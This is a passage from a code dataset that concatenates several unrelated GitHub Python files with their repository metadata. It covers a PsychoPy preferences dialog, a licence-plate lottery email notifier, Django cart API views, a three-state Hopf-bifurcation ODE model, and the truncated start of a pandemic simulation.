wx.propgrid.BoolProperty(label, name, value)})\n\n self.helpText[name] = helpText\n\n def addFileItem(self, section, label=wx.propgrid.PG_LABEL,\n name=wx.propgrid.PG_LABEL, value='', helpText=\"\"):\n if section not in self.sections.keys():\n self.sections[section] = []\n\n prop = wx.propgrid.FileProperty(label, name, value)\n self.sections[section].update({name: prop})\n prop.SetAttribute(wx.propgrid.PG_FILE_SHOW_FULL_PATH, True)\n\n self.helpText[name] = helpText\n\n def addDirItem(self, section, label=wx.propgrid.PG_LABEL,\n name=wx.propgrid.PG_LABEL, value='', helpText=\"\"):\n if section not in self.sections.keys():\n self.sections[section] = dict()\n\n self.sections[section].update(\n {name: wx.propgrid.DirProperty(label, name, value)})\n\n self.helpText[name] = helpText\n\n def addIntegerItem(self, section, label=wx.propgrid.PG_LABEL,\n name=wx.propgrid.PG_LABEL, value=0, helpText=\"\"):\n \"\"\"Add an integer property to a category.\n\n Parameters\n ----------\n section : str\n Category name to add the item too.\n label : str\n Label to be displayed in the property grid.\n name : str\n Internal name for the property.\n value : int\n Default value for the property.\n helpText: str\n Help text for this item.\n\n \"\"\"\n if section not in self.sections.keys():\n self.sections[section] = dict()\n\n self.sections[section].update(\n {name: wx.propgrid.IntProperty(label, name, value=int(value))})\n\n self.helpText[name] = helpText\n\n def addEnumItem(self, section, label=wx.propgrid.PG_LABEL,\n name=wx.propgrid.PG_LABEL, labels=(), values=(), value=0,\n helpText=\"\"):\n if section not in self.sections.keys():\n self.sections[section] = dict()\n\n self.sections[section].update({\n name: wx.propgrid.EnumProperty(label, name, labels, values, value)})\n\n self.helpText[name] = helpText\n\n def populateGrid(self):\n \"\"\"Go over pages and add items to the property grid.\"\"\"\n for i in range(self.proPrefs.GetPageCount()):\n pagePtr, sections = self.pages[i]\n pagePtr.Clear()\n\n for s in sections:\n _ = pagePtr.Append(pg.PropertyCategory(_localized[s], s))\n for name, prop in self.sections[s].items():\n item = pagePtr.Append(prop)\n\n # set the appropriate control to edit the attribute\n if isinstance(prop, wx.propgrid.IntProperty):\n self.proPrefs.SetPropertyEditor(item, \"SpinCtrl\")\n elif isinstance(prop, wx.propgrid.BoolProperty):\n self.proPrefs.SetPropertyAttribute(\n item, \"UseCheckbox\", True)\n try:\n self.proPrefs.SetPropertyHelpString(\n item, self.helpText[item.GetName()])\n except KeyError:\n pass\n\n self.proPrefs.SetSplitterLeft()\n self.setSelection(0)\n\n def setPrefVal(self, section, name, value):\n \"\"\"Set the value of a preference.\"\"\"\n try:\n self.sections[section][name].SetValue(value)\n return True\n except KeyError:\n return False\n\n def getPrefVal(self, section, name):\n \"\"\"Get the value of a preference.\"\"\"\n try:\n return self.sections[section][name].GetValue()\n except KeyError:\n return None\n\n def OnPrefPageDeselected(self, event):\n event.Skip()\n\n def OnPrefPageSelected(self, event):\n sel = self.lstPrefPages.GetFirstSelected()\n\n if sel >= 0:\n self.proPrefs.SelectPage(sel)\n\n event.Skip()\n\n def OnPropPageChanged(self, event):\n event.Skip()\n\n def OnPropPageChanging(self, event):\n event.Skip()\n\n def isModified(self):\n return self.proPrefs.IsAnyModified()\n\n\nclass PreferencesDlg(wx.Dialog):\n \"\"\"Class for a dialog which edits PsychoPy's preferences.\n \"\"\"\n def __init__(self, app):\n wx.Dialog.__init__(\n self, None, id=wx.ID_ANY,\n title=_translate('PsychoPy Preferences'),\n pos=wx.DefaultPosition, size=wx.Size(800, 600),\n style=wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER)\n\n self.app = app\n self.prefsCfg = self.app.prefs.userPrefsCfg\n self.prefsSpec = self.app.prefs.prefsSpec\n\n self._pages = {} # property grids for each page\n\n self.SetSizeHints(wx.DefaultSize, wx.DefaultSize)\n\n sbMain = wx.BoxSizer(wx.VERTICAL)\n\n self.pnlMain = wx.Panel(\n self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,\n wx.TAB_TRAVERSAL)\n sbPrefs = wx.BoxSizer(wx.VERTICAL)\n\n self.proPrefs = PrefPropGrid(\n self.pnlMain, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,\n wx.LB_DEFAULT)\n\n # add property pages to the manager\n self.proPrefs.addPage(\n 'General', 'general', ['general'],\n 'preferences-general')\n self.proPrefs.addPage(\n 'Application', 'app', ['app', 'builder', 'coder'],\n 'preferences-app')\n self.proPrefs.addPage(\n 'Key Bindings', 'keyBindings', ['keyBindings'],\n 'preferences-keyboard')\n self.proPrefs.addPage(\n 'Hardware', 'hardware', ['hardware'], 'preferences-hardware')\n self.proPrefs.addPage(\n 'Connections', 'connections', ['connections'],\n 'preferences-conn')\n self.proPrefs.populateGrid()\n\n sbPrefs.Add(self.proPrefs, 1, wx.EXPAND)\n\n self.stlMain = wx.StaticLine(\n self.pnlMain, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,\n wx.LI_HORIZONTAL)\n sbPrefs.Add(self.stlMain, 0, wx.EXPAND | wx.ALL, 5)\n\n # dialog controls, have builtin localization\n sdbControls = wx.BoxSizer(wx.HORIZONTAL)\n self.sdbControlsHelp = wx.Button(self.pnlMain, wx.ID_HELP)\n sdbControls.Add(self.sdbControlsHelp, 0,\n wx.LEFT | wx.ALL | wx.ALIGN_CENTER_VERTICAL,\n border=3)\n sdbControls.AddStretchSpacer()\n # Add Okay and Cancel buttons\n self.sdbControlsApply = wx.Button(self.pnlMain, wx.ID_APPLY)\n self.sdbControlsOK = wx.Button(self.pnlMain, wx.ID_OK)\n self.sdbControlsCancel = wx.Button(self.pnlMain, wx.ID_CANCEL)\n if sys.platform == \"win32\":\n btns = [self.sdbControlsOK, self.sdbControlsApply, self.sdbControlsCancel]\n else:\n btns = [self.sdbControlsCancel, self.sdbControlsApply, self.sdbControlsOK]\n sdbControls.Add(btns[0], 0,\n wx.ALL | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL,\n border=3)\n sdbControls.Add(btns[1], 0,\n wx.ALL | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL,\n border=3)\n sdbControls.Add(btns[2], 0,\n wx.ALL | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL,\n border=3)\n sbPrefs.Add(sdbControls, flag=wx.ALL | wx.EXPAND, border=3)\n\n self.pnlMain.SetSizer(sbPrefs)\n self.pnlMain.Layout()\n sbPrefs.Fit(self.pnlMain)\n sbMain.Add(self.pnlMain, 1, wx.EXPAND | wx.ALL, 8)\n\n self.SetSizer(sbMain)\n self.Layout()\n\n self.Centre(wx.BOTH)\n\n # Connect Events\n self.sdbControlsApply.Bind(wx.EVT_BUTTON, self.OnApplyClicked)\n self.sdbControlsCancel.Bind(wx.EVT_BUTTON, self.OnCancelClicked)\n self.sdbControlsHelp.Bind(wx.EVT_BUTTON, self.OnHelpClicked)\n self.sdbControlsOK.Bind(wx.EVT_BUTTON, self.OnOKClicked)\n\n # system fonts for font properties\n self.fontList = ['From theme...'] + list(getSystemFonts(fixedWidthOnly=True))\n\n # valid themes\n themePath = self.GetTopLevelParent().app.prefs.paths['themes']\n self.themeList = []\n for file in Path(themePath).glob(\"*.json\"):\n self.themeList.append(file.stem)\n\n # get sound devices for \"audioDevice\" property\n try:\n devnames = sorted(sound.getDevices('output'))\n except (ValueError, OSError, ImportError):\n devnames = []\n\n audioConf = self.prefsCfg['hardware']['audioDevice']\n self.audioDevDefault = audioConf \\\n if type(audioConf) != list else list(audioConf)\n self.audioDevNames = [\n dev.replace('\\r\\n', '') for dev in devnames\n if dev != self.audioDevDefault]\n\n self.populatePrefs()\n\n def __del__(self):\n pass\n\n def populatePrefs(self):\n \"\"\"Populate pages with property items for each preference.\"\"\"\n # clear pages\n for sectionName in self.prefsSpec.keys():\n prefsSection = self.prefsCfg[sectionName]\n specSection = self.prefsSpec[sectionName]\n\n for prefName in specSection:\n if prefName in ['version']: # any other prefs not to show?\n continue\n # allowModuleImports pref is handled by generateSpec.py\n # NB if something is in prefs but not in spec then it won't be\n # shown (removes outdated prefs)\n thisPref = prefsSection[prefName]\n thisSpec = specSection[prefName]\n\n # for keybindings replace Ctrl with Cmd on Mac\n if platform.system() == 'Darwin' and \\\n sectionName == 'keyBindings':\n if thisSpec.startswith('string'):\n thisPref = thisPref.replace('Ctrl+', 'Cmd+')\n\n # can we translate this pref?\n try:\n pLabel = _localized[prefName]\n except Exception:\n pLabel = prefName\n\n # get tooltips from comment lines from the spec, as parsed by\n # configobj\n helpText = ''\n hints = self.prefsSpec[sectionName].comments[prefName] # a list\n if len(hints):\n # use only one comment line, from right above the pref\n hint = hints[-1].lstrip().lstrip('#').lstrip()\n helpText = _translate(hint)\n\n if type(thisPref) == bool:\n # only True or False - use a checkbox\n self.proPrefs.addBoolItem(\n sectionName, pLabel, prefName, thisPref,\n helpText=helpText)\n\n # # properties for fonts, dropdown gives a list of system fonts\n elif prefName in ('codeFont', 'commentFont', 'outputFont'):\n try:\n default = self.fontList.index(thisPref)\n except ValueError:\n default = 0\n labels = [_translate(font) for font in self.fontList]\n self.proPrefs.addEnumItem(\n sectionName,\n pLabel,\n prefName,\n labels=labels,\n values=[i for i in range(len(self.fontList))],\n value=default, helpText=helpText)\n elif prefName in ('theme',):\n try:\n default = self.themeList.index(thisPref)\n except ValueError:\n default = self.themeList.index(\"PsychopyLight\")\n self.proPrefs.addEnumItem(\n sectionName,\n pLabel,\n prefName,\n labels=self.themeList,\n values=[i for i in range(len(self.themeList))],\n value=default, helpText=helpText)\n elif prefName == 'locale':\n thisPref = self.app.prefs.app['locale']\n # '' corresponds to system locale\n locales = [''] + self.app.localization.available\n try:\n default = locales.index(thisPref)\n except ValueError:\n # set default locale ''\n default = locales.index('')\n # '' must be appended after other labels are translated\n labels = [_translate('system locale')] + [_localized[i] \n for i in self.app.localization.available]\n self.proPrefs.addEnumItem(\n sectionName,\n pLabel,\n prefName,\n labels=labels,\n values=[i for i in range(len(locales))],\n value=default, helpText=helpText)\n # # single directory\n elif prefName in ('unpackedDemosDir',):\n self.proPrefs.addDirItem(\n sectionName, pLabel, prefName, thisPref,\n helpText=helpText)\n # single file\n elif prefName in ('flac', 'appKeyGoogleCloud',):\n self.proPrefs.addFileItem(\n sectionName, pLabel, prefName, thisPref,\n helpText=helpText)\n # # audio latency mode for the PTB driver\n elif prefName == 'audioLatencyMode':\n # get the labels from above\n labels = []\n for val, labl in audioLatencyLabels.items():\n labels.append(u'{}: {}'.format(val, labl))\n\n # get the options from the config file spec\n vals = thisSpec.replace(\"option(\", \"\").replace(\"'\", \"\")\n # item -1 is 'default=x' from spec\n vals = vals.replace(\", \", \",\").split(',')\n\n try:\n # set the field to the value in the pref\n default = int(thisPref)\n except ValueError:\n try:\n # use first if default not in list\n default = int(vals[-1].strip('()').split('=')[1])\n except (IndexError, TypeError, ValueError):\n # no default\n default = 0\n\n self.proPrefs.addEnumItem(\n sectionName,\n pLabel,\n prefName,\n labels=labels,\n values=[i for i in range(len(labels))],\n value=default, helpText=helpText)\n # # option items are given a dropdown, current value is shown\n # # in the box\n elif thisSpec.startswith('option') or prefName == 'audioDevice':\n if prefName == 'audioDevice':\n options = self.audioDevNames\n try:\n default = self.audioDevNames.index(\n self.audioDevDefault)\n except ValueError:\n default = 0\n else:\n vals = thisSpec.replace(\"option(\", \"\").replace(\"'\", \"\")\n # item -1 is 'default=x' from spec\n vals = vals.replace(\", \", \",\").split(',')\n options = vals[:-1]\n try:\n # set the field to the value in the pref\n default = options.index(thisPref)\n except ValueError:\n try:\n # use first if default not in list\n default = vals[-1].strip('()').split('=')[1]\n except IndexError:\n # no default\n default = 0\n\n labels = [] # display only\n for opt in options:\n try:\n labels.append(_localized[opt])\n except Exception:\n labels.append(opt)\n\n self.proPrefs.addEnumItem(\n sectionName,\n pLabel,\n prefName,\n labels=labels,\n values=[i for i in range(len(labels))],\n value=default, helpText=helpText)\n if prefName == 'builderLayout':\n item = self.proPrefs.sections[sectionName][prefName]\n for i in range(len(item.GetChoices())):\n choice = item.GetChoices()[i]\n icon = icons.ButtonIcon(stem=choice.Text).bitmap\n choice.SetBitmap(icon)\n # # lists are given a property that can edit and reorder items\n elif thisSpec.startswith('list'): # list\n self.proPrefs.addStringArrayItem(\n sectionName, pLabel, prefName,\n [str(i) for i in thisPref], helpText)\n # integer items\n elif thisSpec.startswith('integer'): # integer\n self.proPrefs.addIntegerItem(\n sectionName, pLabel, prefName, thisPref, helpText)\n # # all other items just use a string field\n else:\n self.proPrefs.addStringItem(\n sectionName, pLabel, prefName, thisPref, helpText)\n\n self.proPrefs.populateGrid()\n\n def applyPrefs(self):\n \"\"\"Write preferences to the current configuration.\"\"\"\n if not self.proPrefs.isModified():\n return\n\n if platform.system() == 'Darwin':\n re_cmd2ctrl = re.compile(r'^Cmd\\+', re.I)\n\n for sectionName in self.prefsSpec:\n for prefName in self.prefsSpec[sectionName]:\n if prefName in ['version']: # any other prefs not to show?\n continue\n\n thisPref = self.proPrefs.getPrefVal(sectionName, prefName)\n # handle special cases\n if prefName in ('codeFont', 'commentFont', 'outputFont'):\n self.prefsCfg[sectionName][prefName] = \\\n self.fontList[thisPref]\n continue\n if prefName in ('theme',):\n self.app.theme = self.prefsCfg[sectionName][prefName] = self.themeList[thisPref]\n continue\n elif prefName == 'audioDevice':\n self.prefsCfg[sectionName][prefName] = \\\n self.audioDevNames[thisPref]\n continue\n elif prefName == 'locale':\n # '' corresponds to system locale\n locales = [''] + self.app.localization.available\n self.app.prefs.app['locale'] = \\\n locales[thisPref]\n self.prefsCfg[sectionName][prefName] = \\\n locales[thisPref]\n continue\n\n # remove invisible trailing whitespace:\n if hasattr(thisPref, 'strip'):\n thisPref = thisPref.strip()\n # regularize the display format for keybindings\n if sectionName == 'keyBindings':\n thisPref = thisPref.replace(' ', '')\n thisPref = '+'.join([part.capitalize()\n for part in thisPref.split('+')])\n if platform.system() == 'Darwin':\n # key-bindings were displayed as 'Cmd+O', revert to\n # 'Ctrl+O' internally\n thisPref = re_cmd2ctrl.sub('Ctrl+', thisPref)\n self.prefsCfg[sectionName][prefName] = thisPref\n\n # make sure list values are converted back to lists (from str)\n if self.prefsSpec[sectionName][prefName].startswith('list'):\n try:\n # if thisPref is not a null string, do eval() to get a\n # list.\n if thisPref == '' or type(thisPref) == list:\n newVal = thisPref\n else:\n newVal = eval(thisPref)\n except Exception:\n # if eval() failed, show warning dialog and return\n try:\n pLabel = _localized[prefName]\n sLabel = _localized[sectionName]\n except Exception:\n pLabel = prefName\n sLabel = sectionName\n txt = _translate(\n 'Invalid value in \"%(pref)s\" (\"%(section)s\" Tab)')\n msg = txt % {'pref': pLabel, 'section': sLabel}\n title = _translate('Error')\n warnDlg = dialogs.MessageDialog(parent=self,\n message=msg,\n type='Info',\n title=title)\n warnDlg.ShowModal()\n return\n if type(newVal) != list:\n self.prefsCfg[sectionName][prefName] = [newVal]\n else:\n self.prefsCfg[sectionName][prefName] = newVal\n elif self.prefsSpec[sectionName][prefName].startswith('option'):\n vals = self.prefsSpec[sectionName][prefName].replace(\n \"option(\", \"\").replace(\"'\", \"\")\n # item -1 is 'default=x' from spec\n options = vals.replace(\", \", \",\").split(',')[:-1]\n self.prefsCfg[sectionName][prefName] = options[thisPref]\n\n self.app.prefs.saveUserPrefs() # includes a validation\n # maybe then go back and set GUI from prefs again, because validation\n # may have changed vals?\n # > sure, why not? - mdc\n self.populatePrefs()\n\n # Update Builder window if needed\n if self.app.builder:\n self.app.builder.updateAllViews()\n\n # after validation, update the UI\n self.updateFramesUI()\n\n def updateFramesUI(self):\n \"\"\"Update the Coder UI (eg. fonts, themes, etc.) from prefs.\"\"\"\n for frame in self.app.getAllFrames():\n if frame.frameType == 'builder':\n frame.layoutPanes()\n elif frame.frameType == 'coder':\n # apply settings over document pages\n for ii in range(frame.notebook.GetPageCount()):\n doc = frame.notebook.GetPage(ii)\n doc.theme = prefs.app['theme']\n for ii in range(frame.shelf.GetPageCount()):\n doc = frame.shelf.GetPage(ii)\n doc.theme = prefs.app['theme']\n\n # apply console font, not handled by theme system ATM\n if hasattr(frame, 'shell'):\n frame.shell.setFonts()\n\n def OnApplyClicked(self, event):\n \"\"\"Apply button clicked, this makes changes to the UI without leaving\n the preference dialog. This can be used to see the effects of setting\n changes before closing the dialog.\n\n \"\"\"\n self.applyPrefs() # saves the preferences\n event.Skip()\n\n def OnCancelClicked(self, event):\n event.Skip()\n\n def OnHelpClicked(self, event):\n self.app.followLink(url=self.app.urls[\"prefs\"])\n event.Skip()\n\n def OnOKClicked(self, event):\n \"\"\"Called when OK is clicked. This closes the dialog after applying the\n settings.\n \"\"\"\n self.applyPrefs()\n event.Skip()\n\n\nif __name__ == '__main__':\n from psychopy import preferences\n if parse_version(wx.__version__) < parse_version('2.9'):\n app = wx.PySimpleApp()\n else:\n app = wx.App(False)\n # don't do this normally - use the existing psychopy.prefs instance\n app.prefs = preferences.Preferences()\n dlg = PreferencesDlg(app)\n dlg.ShowModal()\n","repo_name":"psychopy/versions","sub_path":"psychopy/app/preferencesDlg.py","file_name":"preferencesDlg.py","file_ext":"py","file_size_in_byte":37403,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"15166059805","text":"import yagmail\nimport datetime\n\nfrom settings import DEBUG\nfrom utils.search import data_formatter\nfrom _credentials import EMAIL_USER, EMAIL_PASSWORD, EMAIL_HOST, EMAIL_LIST\nfrom utils.init import get_init_vars\n\n# 连接服务器\n# 用户名、授权码、服务器地址\nYAG_SERVER = yagmail.SMTP(user=EMAIL_USER, password=EMAIL_PASSWORD, host=EMAIL_HOST)\n\n# 周期仅用于改变发送邮件的内容,并不改变更新申请的频率\nAPPLY_UPDATE_CYCLE = 3\n\n\n# START_DATE = '2020-12' # test 已到更新月份\n\n\ndef get_previous_month(str1):\n \"\"\"\n 获取输入日期的上一个月份\n\n :return: int: 月份\n \"\"\"\n first_day_this_month = datetime.datetime.strptime(str1, '%Y-%m-%d').replace(day=1)\n end_day_last_month = first_day_this_month - datetime.timedelta(days=1)\n return end_day_last_month.month\n\n\ndef process_start_date(start_date):\n \"\"\"\n 处理将月份减1用于计算\n\n :param str start_date: 首次摇号年月\n :return: datetime: 日期对象\n \"\"\"\n date = start_date + '-26'\n result = datetime.datetime.strptime(date, '%Y-%m-%d').replace(month=get_previous_month(date))\n return result\n\n\ndef months(str1, str2):\n \"\"\"\n 月份转换器,获取两个日期的月份相差数\n\n :param str str1: %Y-%m-%d\n :param str str2: %Y-%m-%d\n\n :return: int: 相差的月份数\n \"\"\"\n year1 = datetime.datetime.strptime(str1[0:10], \"%Y-%m-%d\").year\n year2 = datetime.datetime.strptime(str2[0:10], \"%Y-%m-%d\").year\n month1 = datetime.datetime.strptime(str1[0:10], \"%Y-%m-%d\").month\n month2 = datetime.datetime.strptime(str2[0:10], \"%Y-%m-%d\").month\n num = (year1 - year2) * 12 + (month1 - month2)\n return num\n\n\ndef send_email(content, result):\n \"\"\"\n 根据不同条件发送不同邮件\n\n :param str content: 邮件通用内容\n :param tuple|bool result: 查询中签返回的结果,未中签返回False\n \"\"\"\n start_date = get_init_vars('START_DATE')\n today = datetime.date.today()\n\n # 发送对象列表\n email_to = EMAIL_LIST\n # 邮件标题\n email_title = '车牌摇号报告'\n\n email_content = content\n extra_content = '\\n未中签,已更新申请了,验证更新结果:https://jtzl.jtj.gz.gov.cn/'\n extra_content2 = '\\n未中签,暂时不需要更新申请,更多查询:https://jtzl.jtj.gz.gov.cn/'\n bingo_content = '\\n中签了!去官网查询结果:https://jtzl.jtj.gz.gov.cn/'\n\n # 如果未中签\n if not result:\n print('未中签。')\n # 如果到了更新月份\n if months(str(today), str(process_start_date(start_date))) % APPLY_UPDATE_CYCLE == 0:\n email_content = email_content + extra_content\n else:\n print('还没到更新月份')\n email_content = email_content + extra_content2\n else:\n print('中签了!')\n email_content = email_content + bingo_content\n\n # 附件列表\n # email_attachments = ['./attachments/report.png', ]\n\n # 发送邮件\n # YAG_SERVER.send(email_to, email_title, email_content, email_attachments)\n YAG_SERVER.send(email_to, email_title, email_content)\n if DEBUG:\n print('中签结果邮件已发送', flush=True)\n\n\nif __name__ == '__main__':\n formatted, raw = data_formatter()\n send_email(formatted, raw)\n","repo_name":"PaRaD1SE98/OpenALPL","sub_path":"utils/mail_sender.py","file_name":"mail_sender.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"15057835811","text":"from drf_spectacular.utils import extend_schema, extend_schema_view\nfrom drf_spectacular import openapi\n\nfrom rest_framework import viewsets\nfrom rest_framework.filters import OrderingFilter\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom cart.api.paginations import CartAPIListPagination\nfrom cart.api.serializers import (\n CartSerializer, AddCartItemSerializer,\n CartItemSerializer, UpdateCartItemSerializer,\n)\nfrom cart.models import Cart, CartItem\n\n\nclass CartViewSet(viewsets.ModelViewSet):\n \"\"\"Cart view for CRUD\"\"\"\n queryset = Cart.objects.all().order_by('-created_at').prefetch_related(\n 'items__product', 'items__product__seller_shop',\n 'items__attribute_value__attribute')\n serializer_class = CartSerializer\n permission_classes = [IsAuthenticated]\n pagination_class = CartAPIListPagination\n filter_backends = (OrderingFilter,)\n\n http_method_names = ['get', 'post', 'delete']\n\n def perform_create(self, serializer):\n serializer.save(user=self.request.user)\n\n\n@extend_schema(\n parameters=[openapi.OpenApiParameter(\n 'cart_pk', openapi.OpenApiTypes.UUID, openapi.OpenApiParameter.PATH)])\n@extend_schema_view(\n partial_update=extend_schema(parameters=[\n openapi.OpenApiParameter('id', openapi.OpenApiTypes.INT,\n openapi.OpenApiParameter.PATH)]),\n update=extend_schema(parameters=[\n openapi.OpenApiParameter('id', openapi.OpenApiTypes.INT,\n openapi.OpenApiParameter.PATH)]),\n retrieve=extend_schema(parameters=[\n openapi.OpenApiParameter('id', openapi.OpenApiTypes.INT,\n openapi.OpenApiParameter.PATH)]),\n destroy=extend_schema(parameters=[\n openapi.OpenApiParameter('id', openapi.OpenApiTypes.INT,\n openapi.OpenApiParameter.PATH)]),\n)\nclass CartItemViewSet(viewsets.ModelViewSet):\n \"\"\"CartItem view for CRUD\"\"\"\n permission_classes = [IsAuthenticated]\n\n http_method_names = ['get', 'post', 'patch', 'delete']\n\n def get_queryset(self):\n return CartItem.objects.filter(\n cart_id=self.kwargs['cart_pk']).prefetch_related(\n 'product', 'product__seller_shop', 'attribute_value',\n 'attribute_value__attribute',\n ).select_related('attribute_value', 'attribute_value__attribute',\n 'product__seller_shop')\n\n def get_serializer_class(self):\n if self.request.method == 'POST':\n return AddCartItemSerializer\n elif self.request.method == 'PATCH':\n return UpdateCartItemSerializer\n return CartItemSerializer\n\n def get_serializer_context(self):\n return {'cart_id': self.kwargs['cart_pk']}\n","repo_name":"MafanNam/MarketPlace_DRF_API","sub_path":"MarketPlace/cart/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31181596370","text":"\"\"\"Model of cylinder wake, used in Noack (2000)\"\"\"\r\n\r\nfrom typing import Optional\r\n\r\nimport torch\r\nfrom torch import Tensor\r\nimport numpy as np\r\nfrom numpy.typing import NDArray\r\n\r\nfrom .. import Model\r\nfrom ..typing import Vector\r\n\r\n__all__ = [\"NoackModel\"]\r\n\r\n\r\nclass NoackModel(Model):\r\n \"\"\"\r\n 3-state ODE model, normal form of Hopf bifurcation, used in Noack (2000)\r\n \"\"\"\r\n num_states = 3\r\n\r\n def __init__(\r\n self,\r\n mu: float = 0.1,\r\n omega: float = 1.,\r\n A: float = -0.1,\r\n lam: float = 10.\r\n ):\r\n self.mu = mu\r\n self.omega = omega\r\n self.A = A\r\n self.lam = lam\r\n\r\n def rhs(self, x: Vector) -> Vector:\r\n out = np.zeros_like(x)\r\n out[..., 0] = self.mu * x[..., 0] - self.omega * x[..., 1] + self.A * x[..., 0] * x[..., 2]\r\n out[..., 1] = self.omega * x[..., 0] + self.mu * x[..., 1] + self.A * x[..., 1] * x[..., 2]\r\n out[..., 2] = -self.lam * (x[..., 2] - x[..., 0]**2 - x[..., 1]**2)\r\n return out\r\n\r\n def jac(self, x: Vector) -> NDArray[np.float64]:\r\n df1 = [self.mu + self.A * x[2], -self.omega, self.A * x[0]]\r\n df2 = [self.omega, self.mu + self.A * x[2], self.A * x[1]]\r\n df3 = [2 * self.lam * x[0], 2 * self.lam * x[1], -self.lam]\r\n return np.array([df1, df2, df3])\r\n\r\n def adjoint_rhs(self, x: Vector, v: Vector) -> Vector:\r\n return self.jac(x).T @ v\r\n\r\n def rhs_tensor(self, x: Tensor) -> Tensor:\r\n out = torch.zeros_like(x)\r\n out[..., 0] = self.mu * x[..., 0] - self.omega * x[..., 1] + self.A * x[..., 0] * x[..., 2]\r\n out[..., 1] = self.omega * x[..., 0] + self.mu * x[..., 1] + self.A * x[..., 1] * x[..., 2]\r\n out[..., 2] = -self.lam * (x[..., 2] - x[..., 0]**2 - x[..., 1]**2)\r\n return out\r\n\r\n def slow_manifold(self, r):\r\n h0 = r**2\r\n h1 = - 2 * r**2 * (self.A * r**2 + self.mu)\r\n h2 = 4 * r**2 * (3 * self.A**2 * r**4\r\n + 4 * self.A * r**2 * self.mu\r\n + self.mu**2)\r\n h3 = -8 * r**2 * (14 * self.A**3 * r**6\r\n + 24 * self.A**2 * r**4 * self.mu\r\n + 11 * self.A * r**2 * self.mu**2\r\n + self.mu**3)\r\n h4 = 16 * r**2 * (85 * self.A**4 * r**8\r\n + 180 * self.A**3 * r**6 * self.mu\r\n + 120 * self.A**2 * r**4 * self.mu**2\r\n + 26 * self.A * r**2 * self.mu**3\r\n + self.mu**4)\r\n return (h0\r\n + h1 * (1 / self.lam)\r\n + h2 * (1 / self.lam)**2\r\n + h3 * (1 / self.lam)**3\r\n + h4 * (1 / self.lam)**4)\r\n\r\n def random_ic(self, max_amplitude: Optional[float] = 6.) -> Vector:\r\n xmax = max_amplitude\r\n zmin = -1 * max_amplitude\r\n zmax = max_amplitude\r\n x = xmax * (2 * np.random.rand() - 1)\r\n y = xmax * (2 * np.random.rand() - 1)\r\n z = zmin + (zmax - zmin) * np.random.rand()\r\n return np.array((x, y, z))\r\n","repo_name":"grmacchio/romnet_chaos2023","sub_path":"romnet/models/noack.py","file_name":"noack.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"21636109846","text":"import numpy as np\nfrom scipy.stats import poisson, skewnorm\n\n\ndef logistic_function(x, a, b, c, d):\n return (a - b) / (1 + np.exp(d*(x - c))) + b\n\n\ndef logistic_function_growth(x, a, b, c):\n return a / (1 + (a / c - 1) * np.exp(-a*b*x))\n\n\ndef lognorm(x, mean=20.1, std=11.6, epsilon=1e-3):\n \"\"\" Log-normal distribution as used for time distribution until death \"\"\"\n sigma = np.sqrt(np.log((std/mean)**2 + 1))\n mu = np.log(mean) - sigma**2 / 2\n x = x.astype(float) + epsilon\n norm = 1 / x / sigma / np.sqrt(2*np.pi)\n return norm * np.exp(-(np.log(x)-mu)**2 / 2 / sigma**2)\n\n\nclass IndividuumDrivenPandemie:\n \"\"\" SimplePandemie \"\"\"\n\n def __init__(self, n_p=15, attack_rate=0.15, t_contagious=4, t_cured=14, t_death=12, t_confirmed=6, infected_start=10,\n lethality=0.01, detection_rate=0.8, nbuffer=10000, total_population=83e6):\n self.n_p = n_p\n self.attack_rate = attack_rate\n self.lethality = lethality\n self.detection_rate = detection_rate\n self.t_contagious = t_contagious\n self.t_cured = t_cured\n self.t_death = t_death\n self.t_confirmed = t_confirmed\n self.total_population = total_population\n\n self.infected = np.zeros(nbuffer).astype(bool)\n self.infected[:infected_start] = True\n self.susceptible = total_population\n self.infected_total, self.infected_total_confirmed = infected_start, 0\n self.infected_day, self.infected_day_confirmed = 0, 0\n self.dead, self.dead_day, self.cured = 0, 0, 0\n self.days = np.zeros(nbuffer).astype(np.uint)\n self.days_to_contagious = np.zeros(nbuffer).astype(np.uint)\n self.days_to_death = -np.ones(nbuffer).astype(np.int)\n self.days_to_cure = -np.ones(nbuffer).astype(np.int)\n self.days_to_detect = -np.ones(nbuffer).astype(np.int)\n self._assign_timing(np.arange(infected_start))\n\n self.scale = 1\n self.fraction_buffer = 0\n self.scale_each = np.ones(nbuffer).astype(int)\n\n def infect(self):\n immune = self.cured + np.sum(self.scale_each*self.infected)\n n_eff = self.n_p * (self.total_population - immune) / self.total_population\n self.infected_day = np.sum(np.random.poisson(n_eff*self.attack_rate, size=np.sum(self.scale_each*self.is_contagious())))\n self.infected_total += self.infected_day\n self.susceptible -= self.infected_day\n selection = np.cumsum(~self.infected * self.scale_each) <= self.infected_day\n select_idx = np.where(~self.infected * selection)[0]\n self.infected[select_idx] = True\n self.fraction_buffer = len(select_idx) / len(self.infected)\n self._assign_timing(select_idx)\n\n def detect(self):\n self.infected_day_confirmed = np.sum(self.scale_each * self.is_detected())\n self.infected_total_confirmed += self.infected_day_confirmed\n\n def cure(self):\n mask_cured = self.is_cured()\n self.cured += np.sum(self.scale_each*mask_cured)\n self._reset(mask_cured)\n\n def die(self):\n mask_die = self.is_dead()\n self.dead_day = np.sum(self.scale_each*mask_die)\n self.dead += self.dead_day\n self.total_population -= self.dead_day\n self._reset(mask_die)\n\n def _assign_timing(self, idx):\n self.days_to_contagious[idx] = np.random.poisson(lam=self.t_contagious, size=len(idx))\n n_deaths = np.random.binomial(len(idx), self.lethality)\n idx_dying = np.random.choice(idx, size=n_deaths, replace=False)\n idx_cure = idx[np.in1d(idx, idx_dying, invert=True)]\n self.days_to_death[idx_dying] = 